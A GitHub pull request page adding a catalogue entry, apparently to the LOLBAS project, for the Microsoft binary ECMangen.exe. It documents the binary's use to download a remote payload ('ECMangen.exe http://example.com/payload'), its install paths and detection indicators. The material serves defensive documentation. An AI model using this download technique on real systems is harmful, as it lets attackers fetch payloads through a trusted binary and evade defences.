Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Add ECMangen.yml #373

Open
wants to merge 2 commits into
base: master
Choose a base branch
from
Open
Changes from all commits
Commits
File filter

Filter by extension

Filter by extension

Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
31 changes: 31 additions & 0 deletions yml/OtherMSBinaries/ECMangen.yml
Original file line number Diff line number Diff line change
@@ -0,0 +1,31 @@
---
Name: ECMangen.exe
Description: Command-line tool for managing certificates in Microsoft Exchange Server.
Author: Avihay Eldad
Created: 2024-04-30
Commands:
- Command: ECMangen.exe http://example.com/payload
Description: Downloads payload from remote server
Usecase: It will download a remote payload and place it in INetCache
Category: Download
Privileges: User
MitreID: T1105
OperatingSystem: Windows
Tags:
- Download: INetCache
Full_Path:
- Path: C:\Program Files (x86)\Microsoft SDKs\Windows\v7.1A\Bin\ECMangen.exe
- Path: C:\Program Files (x86)\Microsoft SDKs\Windows\v7.1A\Bin\x64\ECMangen.exe
- Path: C:\Program Files\Microsoft\Exchange Server\V12\Bin\ECMangen.exe
- Path: C:\Program Files\Microsoft\Exchange Server\V13\Bin\ECMangen.exe
- Path: C:\Program Files\Microsoft\Exchange Server\V14\Bin\ECMangen.exe
- Path: C:\Program Files\Microsoft\Exchange Server\V15\Bin\ECMangen.exe
- Path: C:\Program Files\Microsoft\Exchange Server\Bin\ECMangen.exe
- Path: C:\Program Files\Microsoft\Exchange Server\ClientAccess\Bin\ECMangen.exe
- Path: C:\ExchangeServer\Bin\ECMangen.exe
Detection:
- IOC: URL on a ECMangen command line
- IOC: ECMangen making unexpected network connections or DNS requests
Acknowledgement:
- Person: Avihay Eldad
Handle: '@AvihayEldad'
Loading